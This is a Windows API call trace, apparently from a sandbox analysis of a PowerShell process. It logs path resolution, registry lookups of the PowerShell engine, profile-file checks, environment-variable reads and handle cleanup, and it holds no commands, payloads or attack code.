	[0847.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0847.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0848.705] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0848.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.705] CoTaskMemFree (pv=0x3cbb20) 
	[0848.715] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0848.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.715] CoTaskMemFree (pv=0x3cbb20) 
	[0848.715] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0848.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.716] CoTaskMemFree (pv=0x3cbb20) 
	[0848.716] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0848.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.716] CoTaskMemFree (pv=0x3cbb20) 
	[0848.717] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0848.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.717] CoTaskMemFree (pv=0x3cbb20) 
	[0848.719] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0848.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.719] CoTaskMemFree (pv=0x3cbb20) 
	[0848.719] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0848.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.719] CoTaskMemFree (pv=0x3cbb20) 
	[0853.394] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0853.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0853.394] CoTaskMemFree (pv=0x3cbb20) 
	[0855.918] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3cbc30
	[0855.920] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3cbd40
	[0863.479] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0863.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.479] CoTaskMemFree (pv=0x3cbe50) 
	[0863.482] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0863.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0863.482] CoTaskMemFree (pv=0x3cbe50) 
	[0863.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0863.503] VirtualQuery (in: lpAddress=0x1abba0, lpBuffer=0x1aca60, dwLength=0x30 | out: lpBuffer=0x1aca60*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0863.509] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad9f8 | out: phkResult=0x1ad9f8*=0x30c) returned 0x0
	[0863.509] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad97c, lpData=0x0, lpcbData=0x1ad978*=0x0 | out: lpType=0x1ad97c*=0x1, lpData=0x0, lpcbData=0x1ad978*=0x56) returned 0x0
	[0863.509] CoTaskMemAlloc (cb=0x5a) returned 0x1b84ac60
	[0863.509] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad94c, lpData=0x1b84ac60, lpcbData=0x1ad948*=0x56 | out: lpType=0x1ad94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad948*=0x56) returned 0x0
	[0863.509] CoTaskMemFree (pv=0x1b84ac60) 
	[0863.509] RegCloseKey (hKey=0x30c) returned 0x0
	[0863.509] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad9f8 | out: phkResult=0x1ad9f8*=0x30c) returned 0x0
	[0863.510] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad97c, lpData=0x0, lpcbData=0x1ad978*=0x0 | out: lpType=0x1ad97c*=0x1, lpData=0x0, lpcbData=0x1ad978*=0x56) returned 0x0
	[0863.510] CoTaskMemAlloc (cb=0x5a) returned 0x1b84ac60
	[0864.349] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad94c, lpData=0x1b84ac60, lpcbData=0x1ad948*=0x56 | out: lpType=0x1ad94c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad948*=0x56) returned 0x0
	[0864.349] CoTaskMemFree (pv=0x1b84ac60) 
	[0864.349] RegCloseKey (hKey=0x30c) returned 0x0
	[0864.352] CoTaskMemAlloc (cb=0x20c) returned 0x1b828580
	[0864.352] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b828580 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0864.353] CoTaskMemFree (pv=0x1b828580) 
	[0864.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0864.354] CoTaskMemAlloc (cb=0x20c) returned 0x1b828580
	[0864.354] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b828580 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0864.354] CoTaskMemFree (pv=0x1b828580) 
	[0864.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ad5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0864.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0864.355] SetErrorMode (uMode=0x1) returned 0x1
	[0864.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad960 | out: lpFileInformation=0x1ad960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0864.355] SetErrorMode (uMode=0x1) returned 0x1
	[0864.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0864.355] SetErrorMode (uMode=0x1) returned 0x1
	[0864.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad960 | out: lpFileInformation=0x1ad960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0864.355] SetErrorMode (uMode=0x1) returned 0x1
	[0864.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0864.356] SetErrorMode (uMode=0x1) returned 0x1
	[0864.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad960 | out: lpFileInformation=0x1ad960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0864.356] SetErrorMode (uMode=0x1) returned 0x1
	[0864.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0864.356] SetErrorMode (uMode=0x1) returned 0x1
	[0864.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ad960 | out: lpFileInformation=0x1ad960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0864.356] SetErrorMode (uMode=0x1) returned 0x1
	[0864.357] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.357] CoTaskMemFree (pv=0x3cbe50) 
	[0864.357] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.357] CoTaskMemFree (pv=0x3cbe50) 
	[0864.358] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.358] CoTaskMemFree (pv=0x3cbe50) 
	[0864.358] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.359] CoTaskMemFree (pv=0x3cbe50) 
	[0864.359] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.359] CoTaskMemFree (pv=0x3cbe50) 
	[0864.360] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.360] CoTaskMemFree (pv=0x3cbe50) 
	[0864.362] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0864.362] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1adb40 | out: lpMode=0x1adb40) returned 1
	[0864.363] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.363] CoTaskMemFree (pv=0x3cbe50) 
	[0864.366] SetEvent (hEvent=0x330) returned 1
	[0864.366] SetEvent (hEvent=0x324) returned 1
	[0864.366] SetEvent (hEvent=0x3a0) returned 1
	[0864.367] SetEvent (hEvent=0x328) returned 1
	[0864.368] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0864.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0864.368] CoTaskMemFree (pv=0x3cbe50) 
	[0864.369] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad898 | out: phkResult=0x1ad898*=0x360) returned 0x0
	[0864.369] RegQueryValueExW (in: hKey=0x360, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ad81c, lpData=0x0, lpcbData=0x1ad818*=0x0 | out: lpType=0x1ad81c*=0x0, lpData=0x0, lpcbData=0x1ad818*=0x0) returned 0x2

Thread:
	id = 658
	os_tid = 0x148c


Thread:
	id = 661
	os_tid = 0x14a0


Thread:
	id = 1191
	os_tid = 0x15a8


Thread:
	id = 1194
	os_tid = 0x12f8


Thread:
	id = 1233
	os_tid = 0x19f8


Thread:
	id = 1272
	os_tid = 0x1cb0


Thread:
	id = 1279
	os_tid = 0x1cd8

	[0649.571] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0782.579] LocalFree (hMem=0x317340) returned 0x0
	[0782.579] LocalFree (hMem=0x317220) returned 0x0
	[0782.579] CloseHandle (hObject=0x31c) returned 1
	[0782.580] CloseHandle (hObject=0x13) returned 1
	[0782.927] CloseHandle (hObject=0xf) returned 1
	[0782.930] RegCloseKey (hKey=0x30c) returned 0x0
	[0782.930] RegCloseKey (hKey=0x308) returned 0x0
	[0782.931] RegCloseKey (hKey=0x304) returned 0x0
	[0792.275] RegCloseKey (hKey=0x304) returned 0x0
	[0805.215] RegCloseKey (hKey=0x304) returned 0x0
	[0848.730] RegCloseKey (hKey=0x39c) returned 0x0
	[0848.730] RegCloseKey (hKey=0x398) returned 0x0
	[0848.731] RegCloseKey (hKey=0x374) returned 0x0
	[0848.731] RegCloseKey (hKey=0x3b0) returned 0x0
	[0848.731] RegCloseKey (hKey=0x390) returned 0x0
	[0848.731] RegCloseKey (hKey=0x38c) returned 0x0
	[0848.732] RegCloseKey (hKey=0x388) returned 0x0
	[0848.732] RegCloseKey (hKey=0x384) returned 0x0
	[0848.732] RegCloseKey (hKey=0x380) returned 0x0
	[0848.733] RegCloseKey (hKey=0x37c) returned 0x0
	[0848.733] RegCloseKey (hKey=0x378) returned 0x0
	[0848.733] RegCloseKey (hKey=0x350) returned 0x0
	[0848.733] RegCloseKey (hKey=0x3ac) returned 0x0
	[0848.734] RegCloseKey (hKey=0x3a8) returned 0x0
	[0848.734] RegCloseKey (hKey=0x370) returned 0x0
	[0848.734] RegCloseKey (hKey=0x36c) returned 0x0
	[0848.734] RegCloseKey (hKey=0x368) returned 0x0
	[0848.735] RegCloseKey (hKey=0x364) returned 0x0
	[0848.735] RegCloseKey (hKey=0x360) returned 0x0
	[0848.735] RegCloseKey (hKey=0x35c) returned 0x0
	[0848.735] RegCloseKey (hKey=0x358) returned 0x0
	[0848.736] RegCloseKey (hKey=0x354) returned 0x0
	[0848.736] RegCloseKey (hKey=0x3a4) returned 0x0
	[0848.736] RegCloseKey (hKey=0x344) returned 0x0
	[0848.736] RegCloseKey (hKey=0x340) returned 0x0
	[0848.737] RegCloseKey (hKey=0x33c) returned 0x0
	[0848.737] RegCloseKey (hKey=0x338) returned 0x0
	[0848.737] RegCloseKey (hKey=0x334) returned 0x0
	[0848.738] RegCloseKey (hKey=0x330) returned 0x0
	[0848.738] RegCloseKey (hKey=0x328) returned 0x0
	[0848.738] RegCloseKey (hKey=0x324) returned 0x0
	[0848.738] RegCloseKey (hKey=0x3a0) returned 0x0
	[0848.739] RegCloseKey (hKey=0x30c) returned 0x0
	[0848.739] RegCloseKey (hKey=0x304) returned 0x0
	[0869.265] RegCloseKey (hKey=0x360) returned 0x0
	[0925.593] CloseHandle (hObject=0x4c4) returned 1
	[0925.593] CloseHandle (hObject=0x360) returned 1
	[0925.594] CertCloseStore (hCertStore=0x30f9a0, dwFlags=0x0) returned 1
	[0925.594] CertFreeCRLContext (pCrlContext=0x1b84f580) returned 1
	[0925.594] CloseHandle (hObject=0x4b4) returned 1
	[0925.595] CloseHandle (hObject=0x4b0) returned 1
	[0925.595] CloseHandle (hObject=0x460) returned 1
	[0925.596] CertFreeCRLContext (pCrlContext=0x1b84f600) returned 1
	[0925.596] CloseHandle (hObject=0x45c) returned 1
	[0925.597] CertFreeCRLContext (pCrlContext=0x1cd844e0) returned 1
	[0925.598] CloseHandle (hObject=0x408) returned 1
	[0925.598] CloseHandle (hObject=0x404) returned 1
	[0925.599] CertFreeCRLContext (pCrlContext=0x1cd84460) returned 1
	[0925.599] CloseHandle (hObject=0x394) returned 1
	[0925.600] CloseHandle (hObject=0x39c) returned 1
	[0925.600] CloseHandle (hObject=0x398) returned 1
	[0925.600] CloseHandle (hObject=0x374) returned 1
	[0925.601] CloseHandle (hObject=0x3b0) returned 1
	[0925.601] CloseHandle (hObject=0x388) returned 1
	[0925.602] CloseHandle (hObject=0x384) returned 1
	[0925.602] CloseHandle (hObject=0x380) returned 1
	[0925.603] CloseHandle (hObject=0x37c) returned 1
	[0925.603] CertFreeCRLContext (pCrlContext=0x1b84f580) returned 1
	[0925.604] CloseHandle (hObject=0x378) returned 1
	[0925.604] CloseHandle (hObject=0x3ac) returned 1
	[0925.605] CloseHandle (hObject=0x350) returned 1

Thread:
	id = 1297
	os_tid = 0x1d50


Thread:
	id = 1871
	os_tid = 0x24d0

	[0865.306] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0865.313] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0865.317] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0865.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.317] CoTaskMemFree (pv=0x3cbe50) 
	[0865.319] VirtualQuery (in: lpAddress=0x1c69de60, lpBuffer=0x1c69ed20, dwLength=0x30 | out: lpBuffer=0x1c69ed20*(BaseAddress=0x1c69d000, AllocationBase=0x1bd10000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0865.325] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0865.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.325] CoTaskMemFree (pv=0x3cbe50) 
	[0865.327] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0865.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.327] CoTaskMemFree (pv=0x3cbe50) 
	[0865.331] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0865.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.331] CoTaskMemFree (pv=0x3cbe50) 
	[0865.341] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0865.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.341] CoTaskMemFree (pv=0x3cbe50) 
	[0865.343] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0865.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.343] CoTaskMemFree (pv=0x3cbe50) 
	[0865.345] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0865.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0865.345] CoTaskMemFree (pv=0x3cbe50) 
	[0865.350] VirtualQuery (in: lpAddress=0x1c69e110, lpBuffer=0x1c69efd0, dwLength=0x30 | out: lpBuffer=0x1c69efd0*(BaseAddress=0x1c69e000, AllocationBase=0x1bd10000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0866.397] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0866.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.397] CoTaskMemFree (pv=0x3cbe50) 
	[0866.400] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0866.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.400] CoTaskMemFree (pv=0x3cbe50) 
	[0866.400] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0866.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.400] CoTaskMemFree (pv=0x3cbe50) 
	[0866.402] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0866.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.402] CoTaskMemFree (pv=0x3cbe50) 
	[0866.407] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0866.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0866.407] CoTaskMemFree (pv=0x3cbe50) 
